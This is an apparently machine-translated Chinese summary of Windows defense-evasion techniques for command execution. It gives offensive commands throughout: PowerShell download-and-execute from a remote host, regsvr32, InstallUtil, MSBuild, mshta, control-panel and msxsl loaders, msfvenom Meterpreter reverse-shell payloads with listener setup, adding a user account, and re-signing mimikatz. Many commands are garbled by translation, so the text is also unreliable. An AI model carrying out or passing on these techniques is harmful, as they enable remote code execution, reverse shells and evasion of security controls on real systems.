正在閱讀：Windows命令執(zhí)行防御規(guī)避總結(jié)Windows命令執(zhí)行防御規(guī)避總結(jié)

 

powershell.exe-nop-w隱藏-c”IEX。downloadstring(' http://xx . xx . xx . xx:8888/logo . gif ')\ "/f

 

啜飲

 

通過sip劫持從惡意代碼簽名中獲得系統(tǒng)信任的Https://github.com/secretsquirrel/SigThief

 

consent.exe-mimikatz.exe-signed-mimikatz.exe

 

rundll32.exe

 

產(chǎn)生

 

xxx.dll

 

目標(biāo)執(zhí)行

 

rundll32.exe外殼32.dll，xxx.dll控件

 

Regsvr32.exe

 

msfconsole

 

輔助/服務(wù)器/regsvr 32 _ command _ delivery _ server

 

設(shè)置CMD網(wǎng)絡(luò)用戶測(cè)試123456 /add

 

目標(biāo)執(zhí)行

 

regsvr 32/s/n/u/I:http://xx . xx . xx . xx:8080/APxob0o scrobj.dll

 

InstallUtil.exe

 

1.編譯后門:

 

c:\ Windows \微軟。csc.exe/r:系統(tǒng)。EnterpriseServices.dll/不安全/目標(biāo):庫/輸出:XXX . exe/key file:“C:\ Program Files(x86)\ Microsoft SDKs \ Windows \ v 10.0a \ bin \ NETFX 4.8 Tools \ x64 \ key . snk”XXX . cs

 

2.在無人機(jī)上運(yùn)行:

 

InstallUtil.exe/xxx.exe大學(xué)

 

3.msf監(jiān)控并獲取彈殼:

 

設(shè)置有效負(fù)載窗口/x64/meterpreter/reverse_tcp

 

設(shè)置LHOST xx.xx.xx.xx

 

設(shè)置LPORT 4444

 

剝削

 

Msbuild.exe

 

MSBuild是微軟Build Engine的縮寫，代表了微軟和Visual Studio的新一代平臺(tái)。MSBuild可以編譯特定格式的xml文件。

 

https://github.com/3gstudent/msbuild-inline-task

 

Msf生成外殼代碼

 

msfvene-p windows/x64/meter preter/reverse _ TCP lhost = xx . xx . xx . xx lport = 4444

 

f-csharp

 

使用shellcode替換https://github.com/3g學(xué)生/msbuild-inline-task/blob/master/executes % 20x 64% 20 shellcode . XML中的shellcode部分。

 

Msf監(jiān)控

 

使用利用/多重/處理程序

 

設(shè)置有效負(fù)載窗口/x64/meterpreter/reverse_tcp

 

設(shè)置lhost xx.xx.xx.xx

 

設(shè)置lport 4444

 

剝削

 

奔跑

 

c:\ Windows \微軟。. NET \ Framework \ v 4 . 0 . 30319 \ MsBuild . exe exec 64 . XML

 

CMSTP

 

Cmstp.exe/s/ns c:\ users \ administrator \ appdata \ local \ temp \ xknqbpzl . txt繞過AppLocker并啟動(dòng)惡意腳本。

 

Mshta.exe

 

Mshta.exe是一個(gè)執(zhí)行微軟HTML應(yīng)用程序的實(shí)用程序(HTA)。攻擊者可以使用mshta.exe通過受信任的Windows實(shí)用程序代理執(zhí)行惡意代碼。

 

使用漏洞/windows/misc/hta_server

 

msf漏洞利用(windows/misc/hta_server)】設(shè)置srvhost xx.xx.xx.xx

 

msf漏洞利用(windows/misc/hta_server)】漏洞利用

 

mshta.exe·http://xx.xx.xx.xx:8080/xxxxxxx.hta

 

控制面板

 

攻擊者可以使用控制面板項(xiàng)目作為有效負(fù)載來執(zhí)行任意命令�？刂泼姘屙�(xiàng)目是注冊(cè)的可執(zhí)行文件(。exe)或控制面板(。cpl)文件，可以直接從命令行執(zhí)行，也可以通過Control_RunDLL(API)調(diào)用，或者直接雙擊。

 

攻擊者構(gòu)建惡意dll文件CPIApplet.dll。

 

用msf生成dll文件:

 

msfvene-p windows/x64/meter preter/reverse _ TCP LHOST = 170 . 170 . 64 . 17 LPORT = 4444-f dll ”/ tmp/CPIapplet . dll

 

將其傳遞到windows機(jī)器中，然后將其重命名為CPIApplet.cpl，并通過control.exe c:\ user \ administrator \ desktop \ CPI applet . CPL執(zhí)行該命令。

 

msxsl.exe通過調(diào)用惡意xml文件來執(zhí)行腳本

 

制作兩個(gè)文件。

 

customers.xml

 

script.xsl

 

http://www.w3.org/1999/XSL/Transform"

 

xmlns:msxsl = " urn:schemas-Microsoft-com:XSLT "

 

用戶=“http://mycompany.com/mynamespace"》

 

函數(shù)xml(節(jié)點(diǎn)列表){ 0

 

var r = new ActiveXObject("WScript。外殼”)。run(" cmd.exe/k calc . exe ")；

 

返回nodelist.nextNode()。xml

 

}

 

打開http服務(wù)

 

python3 -m http.server 80

 

遠(yuǎn)程下載執(zhí)行

 

msxsl.exe·http://xx.xx.xx.xx/customers.xml·http://xx.xx.xx.xx/scrip.xsl